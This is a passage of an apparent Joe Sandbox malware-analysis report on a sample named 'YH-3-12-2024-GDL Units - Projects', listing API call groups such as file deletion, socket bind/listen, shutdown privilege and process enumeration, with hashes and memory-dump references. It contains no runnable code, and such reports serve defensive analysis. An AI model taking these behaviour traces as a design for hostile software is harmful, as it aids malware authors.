                                                        • Instruction Fuzzy Hash: A621A139200614DFDB10AF24DC09B6E7BA8FF56711F11802DFA4ADB2A2DB74AC40CB95
                                                        APIs
                                                          • Part of subcall function 007C4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,007C4743,?,?,007C37AE,?), ref: 007C4770
                                                          • Part of subcall function 00824A31: GetFileAttributesW.KERNEL32(?,0082370B), ref: 00824A32
                                                        • FindFirstFileW.KERNEL32(?,?), ref: 008238A3
                                                        • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 0082394B
                                                        • MoveFileW.KERNEL32(?,?), ref: 0082395E
                                                        • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 0082397B
                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 0082399D
                                                        • FindClose.KERNEL32(00000000,?,?,?,?), ref: 008239B9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                        • String ID: \*.*
                                                        • API String ID: 4002782344-1173974218
                                                        • Opcode ID: 224e2ab82ff588beef10d1a50995b0d3b6e14337a589f5cfc8cb9a762bbfdb11
                                                        • Instruction ID: b042476f4cbfdf37b96223cfc0df7ac50bae8e06c8327bf22de27ef00ac26595
                                                        • Opcode Fuzzy Hash: 224e2ab82ff588beef10d1a50995b0d3b6e14337a589f5cfc8cb9a762bbfdb11
                                                        • Instruction Fuzzy Hash: 4E51933180415CEACF05EBA4D966EEDBB79BF16300F60406DE402B6191DF396F89CB61
                                                        APIs
                                                          • Part of subcall function 007C7DE1: _memmove.LIBCMT ref: 007C7E22
                                                        • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0082F440
                                                        • Sleep.KERNEL32(0000000A), ref: 0082F470
                                                        • _wcscmp.LIBCMT ref: 0082F484
                                                        • _wcscmp.LIBCMT ref: 0082F49F
                                                        • FindNextFileW.KERNEL32(?,?), ref: 0082F53D
                                                        • FindClose.KERNEL32(00000000), ref: 0082F553
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                        • String ID: *.*
                                                        • API String ID: 713712311-438819550
                                                        • Opcode ID: 2ac33c865cb8aeffe8d91b0879e69c03fa0945c8e33b588baf08a5674f09d240
                                                        • Instruction ID: d760d72782b610b54aaa118b0a52d13ed5ea5fe3bd943f795863b34226eeaa3a
                                                        • Opcode Fuzzy Hash: 2ac33c865cb8aeffe8d91b0879e69c03fa0945c8e33b588baf08a5674f09d240
                                                        • Instruction Fuzzy Hash: 20414B7190022A9BCF14EF64DC49AEEBBB8FF05310F14457AE915E2292EB359A84CF50
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: __itow__swprintf
                                                        • String ID: 3c}$_}
                                                        • API String ID: 674341424-2413270705
                                                        • Opcode ID: c9c4b954acdccdbe26cb4293ebe86426243ea153dac3e70baeb74dd0775fe8d9
                                                        • Instruction ID: 97e0dd00c3958816e963daaa0724a50ee2cd903d2fb5eabea4296b12ff913c1e
                                                        • Opcode Fuzzy Hash: c9c4b954acdccdbe26cb4293ebe86426243ea153dac3e70baeb74dd0775fe8d9
                                                        • Instruction Fuzzy Hash: A32287716083419FD764DF24C885BAAB7E4FF84310F10492EF98A97381EB79E944CB92
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: _memmove
                                                        • String ID:
                                                        • API String ID: 4104443479-0
                                                        • Opcode ID: e5497f9e0cec8b2602225b7b1342a4e6dea9abe0fc389f9d4e57c6c52d82d7c2
                                                        • Instruction ID: a99af3f3b86de520bcabd5647172c186219c9a0a002817c84a3bbf9eea09d74d
                                                        • Opcode Fuzzy Hash: e5497f9e0cec8b2602225b7b1342a4e6dea9abe0fc389f9d4e57c6c52d82d7c2
                                                        • Instruction Fuzzy Hash: B9127970A00609DFDF04DFA5D985AEEB7B9FF48310F10452AE846E7250EB7AAD90CB51
                                                        APIs
                                                          • Part of subcall function 007C4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,007C4743,?,?,007C37AE,?), ref: 007C4770
                                                          • Part of subcall function 00824A31: GetFileAttributesW.KERNEL32(?,0082370B), ref: 00824A32
                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00823B89
                                                        • DeleteFileW.KERNEL32(?,?,?,?), ref: 00823BD9
                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00823BEA
                                                        • FindClose.KERNEL32(00000000), ref: 00823C01
                                                        • FindClose.KERNEL32(00000000), ref: 00823C0A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                        • String ID: \*.*
                                                        • API String ID: 2649000838-1173974218
                                                        • Opcode ID: 3e8ba7b74916faa5826e9a7159df414e9c212183f6b1f1d88391af22cb4c27be
                                                        • Instruction ID: ca65da4313f6efb013b92c8f95742f4cabeeecafd7f0f1c081a3cb00af6469fc
                                                        • Opcode Fuzzy Hash: 3e8ba7b74916faa5826e9a7159df414e9c212183f6b1f1d88391af22cb4c27be
                                                        • Instruction Fuzzy Hash: 2E318D31008395DBC305EF24D8A9DAFB7E8BE96314F404D2DF4D592192EB299A08CB63
                                                        APIs
                                                          • Part of subcall function 008187E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0081882B
                                                          • Part of subcall function 008187E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00818858
                                                          • Part of subcall function 008187E1: GetLastError.KERNEL32 ref: 00818865
                                                        • ExitWindowsEx.USER32(?,00000000), ref: 008251F9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                        • String ID: $@$SeShutdownPrivilege
                                                        • API String ID: 2234035333-194228
                                                        • Opcode ID: 44b31fece32fdad309e733fcf9ddf7f6d0cabbdda87c202adac4c6da76082946
                                                        • Instruction ID: 583cfaa1e262a83aeb1cd32fcb92d96290885487133209295cc32d694c036ad2
                                                        • Opcode Fuzzy Hash: 44b31fece32fdad309e733fcf9ddf7f6d0cabbdda87c202adac4c6da76082946
                                                        • Instruction Fuzzy Hash: 0C012B357D1635EBF7286268BC9BFBB729CFB05354F240425F917E20D2DA715C808590
                                                        APIs
                                                        • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 008362DC
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 008362EB
                                                        • bind.WSOCK32(00000000,?,00000010), ref: 00836307
                                                        • listen.WSOCK32(00000000,00000005), ref: 00836316
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00836330
                                                        • closesocket.WSOCK32(00000000,00000000), ref: 00836344
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast$bindclosesocketlistensocket
                                                        • String ID:
                                                        • API String ID: 1279440585-0
                                                        • Opcode ID: 84c66fcdfe279a168cd9fdc5aed065ce2611933b7a8127111651b18fe0cdcb6a
                                                        • Instruction ID: 92c552d42c21f0cfbd9b38ec9ebe78a989d3fef841c66ebca4433b111611ccc9
                                                        • Opcode Fuzzy Hash: 84c66fcdfe279a168cd9fdc5aed065ce2611933b7a8127111651b18fe0cdcb6a
                                                        • Instruction Fuzzy Hash: 5B21B175600204AFCB10AF68C849B6EB7A9FF89710F14816CEA56D7392DB74AC11CB91
                                                        APIs
                                                          • Part of subcall function 007E0DB6: std::exception::exception.LIBCMT ref: 007E0DEC
                                                          • Part of subcall function 007E0DB6: __CxxThrowException@8.LIBCMT ref: 007E0E01
                                                        • _memmove.LIBCMT ref: 00810258
                                                        • _memmove.LIBCMT ref: 0081036D
                                                        • _memmove.LIBCMT ref: 00810414
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                        • String ID:
                                                        • API String ID: 1300846289-0
                                                        • Opcode ID: 02f1f4f6f0b11da4456960ea662d437d820eab78913a2c8266ea244b0c2a1b4f
                                                        • Instruction ID: bfc8241bdcb3a245fe36487ad9e020c30d7ef627573bbfcd2f0b24033f2d6e23
                                                        • Opcode Fuzzy Hash: 02f1f4f6f0b11da4456960ea662d437d820eab78913a2c8266ea244b0c2a1b4f
                                                        • Instruction Fuzzy Hash: 6402A0B0A00209DBCF04DF65D985AAE7BB9FF48310F14806DE80ADB355EB79D990CB95
                                                        APIs
                                                          • Part of subcall function 007C2612: GetWindowLongW.USER32(?,000000EB), ref: 007C2623
                                                        • DefDlgProcW.USER32(?,?,?,?,?), ref: 007C19FA
                                                        • GetSysColor.USER32(0000000F), ref: 007C1A4E
                                                        • SetBkColor.GDI32(?,00000000), ref: 007C1A61
                                                          • Part of subcall function 007C1290: DefDlgProcW.USER32(?,00000020,?), ref: 007C12D8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: ColorProc$LongWindow
                                                        • String ID:
                                                        • API String ID: 3744519093-0
                                                        • Opcode ID: fa465c4b025a4ae09389791506f02ceccb1919c15b5bb5cff0880bf574563b56
                                                        • Instruction ID: accd00b67cf4aacce846755041e062557976ba0459f3824035e8a0da01420199
                                                        • Opcode Fuzzy Hash: fa465c4b025a4ae09389791506f02ceccb1919c15b5bb5cff0880bf574563b56
                                                        • Instruction Fuzzy Hash: 8AA10A71106588FAE628AB3D8C48F7F275DEB43341B94813EF603D5293DA2DED0196B6
                                                        APIs
                                                        • FindFirstFileW.KERNEL32(?,?), ref: 0082BCE6
                                                        • _wcscmp.LIBCMT ref: 0082BD16
                                                        • _wcscmp.LIBCMT ref: 0082BD2B
                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 0082BD3C
                                                        • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0082BD6C
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Find$File_wcscmp$CloseFirstNext
                                                        • String ID:
                                                        • API String ID: 2387731787-0
                                                        • Opcode ID: ceae5ec6b89b261861c7227ff7abea015bee754225c59f8a570a4cb56daa158d
                                                        • Instruction ID: 229c380943f258c4499ea592af862d059d774663d59de6b9360a0d01ed7672f1
                                                        • Opcode Fuzzy Hash: ceae5ec6b89b261861c7227ff7abea015bee754225c59f8a570a4cb56daa158d
                                                        • Instruction Fuzzy Hash: 88517635604612DFC718DF28D494EAAB3E8FF49320F10461DEA56C73A2DB34AD44CB91
                                                        APIs
                                                          • Part of subcall function 00837D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00837DB6
                                                        • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0083679E
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 008367C7
                                                        • bind.WSOCK32(00000000,?,00000010), ref: 00836800
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 0083680D
                                                        • closesocket.WSOCK32(00000000,00000000), ref: 00836821
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                        • String ID:
                                                        • API String ID: 99427753-0
                                                        • Opcode ID: 1fe74ad5805d4bf241d28c0a13cc256e581e0384b082406433807964bc99968d
                                                        • Instruction ID: 58b49f12dc8978bbe9afdfa88cbb497742c2da041aedf239f8ee5e75a92a6de6
                                                        • Opcode Fuzzy Hash: 1fe74ad5805d4bf241d28c0a13cc256e581e0384b082406433807964bc99968d
                                                        • Instruction Fuzzy Hash: 1641B375600204EFDB50AF28888AF6E77E8EF49714F44856CFA16AB3C3DA749D008792
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                        • String ID:
                                                        • API String ID: 292994002-0
                                                        • Opcode ID: b234a75795e8a08cb8ff183a1671e38c10a3271603da7fd1baf0601c6d7171cf
                                                        • Instruction ID: afbc5516e0b5c544563aed8dbba3de809bf99192673e5f2eebfa05cf24ee98f2
                                                        • Opcode Fuzzy Hash: b234a75795e8a08cb8ff183a1671e38c10a3271603da7fd1baf0601c6d7171cf
                                                        • Instruction Fuzzy Hash: C411C431300A19AFEB215F269C48B6FBB99FF467A1B41402DF945D7243DB74DD01CAA4
                                                        APIs
                                                        • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 008180C0
                                                        • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 008180CA
                                                        • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 008180D9
                                                        • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 008180E0
                                                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 008180F6
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: HeapInformationToken$AllocErrorLastProcess
                                                        • String ID:
                                                        • API String ID: 44706859-0
                                                        • Opcode ID: 52f921bfbcb4a17050ee9ad92b7ce8f2ee1866f55c73a58271a3a4401027d164
                                                        • Instruction ID: e3cf3648f546febae584babeeb9e8e3e2fe0ab2e8cbb29bb542bfae160844844
                                                        • Opcode Fuzzy Hash: 52f921bfbcb4a17050ee9ad92b7ce8f2ee1866f55c73a58271a3a4401027d164
                                                        • Instruction Fuzzy Hash: C5F06235240204FFEB214FA5EC8DEA73BACFF8A755F000029FA45C6151CB619C41DA60
                                                        APIs
                                                        • CoInitialize.OLE32(00000000), ref: 0082C432
                                                        • CoCreateInstance.OLE32(00852D6C,00000000,00000001,00852BDC,?), ref: 0082C44A
                                                          • Part of subcall function 007C7DE1: _memmove.LIBCMT ref: 007C7E22
                                                        • CoUninitialize.OLE32 ref: 0082C6B7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: CreateInitializeInstanceUninitialize_memmove
                                                        • String ID: .lnk
                                                        • API String ID: 2683427295-24824748
                                                        • Opcode ID: df9bb77d297a69520a8885b2ab8b0c286a675a5f1990c21e5f24d515e74bcfd0
                                                        • Instruction ID: 7faa7e532c8f031c3ea95e2fec1121bdde7304f7c80108d0de8bf1947afa258b
                                                        • Opcode Fuzzy Hash: df9bb77d297a69520a8885b2ab8b0c286a675a5f1990c21e5f24d515e74bcfd0
                                                        • Instruction Fuzzy Hash: A0A14971204205EFD300EF54C885EABB7E8FF99354F00492DF1968B1A2EB75EA49CB52
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,007C4AD0), ref: 007C4B45
                                                        • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 007C4B57
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                         • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: GetNativeSystemInfo$kernel32.dll
                                                        • API String ID: 2574300362-192647395
                                                        • Opcode ID: 7869b81c767a6b718dbcc0652564268f6e3f45878eea31917dd56618cace6d6d
                                                        • Instruction ID: 7a14cd5044f1cd85566f0df30d0b58582b537cb04ad6b885a669a86216009731
                                                        • Opcode Fuzzy Hash: 7869b81c767a6b718dbcc0652564268f6e3f45878eea31917dd56618cace6d6d
                                                        • Instruction Fuzzy Hash: 92D017B8A10717DFD7209F32E828F4676E4FF063A5B11883EA596D6251E678E880CA54
                                                        APIs
                                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 0083EE3D
                                                        • Process32FirstW.KERNEL32(00000000,?), ref: 0083EE4B
                                                          • Part of subcall function 007C7DE1: _memmove.LIBCMT ref: 007C7E22
                                                        • Process32NextW.KERNEL32(00000000,?), ref: 0083EF0B
                                                        • CloseHandle.KERNEL32(00000000,?,?,?), ref: 0083EF1A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                         • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                        • String ID:
                                                        • API String ID: 2576544623-0
                                                        • Opcode ID: f778580715a8f2f07c305607c91178c659e071887fa540146d5a1d8a9850a047
                                                        • Instruction ID: bbab6947b77a87d86e2aca74164de606f5b565760ad0943b61a941dd910b80f5
                                                        • Opcode Fuzzy Hash: f778580715a8f2f07c305607c91178c659e071887fa540146d5a1d8a9850a047
                                                        • Instruction Fuzzy Hash: 94516A71504715EBD310EF24D889F6BB7E8FF98710F10482DF596972A2EB74A908CB92
                                                        APIs
                                                        • lstrlenW.KERNEL32(?,?,?,00000000), ref: 0081E628
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
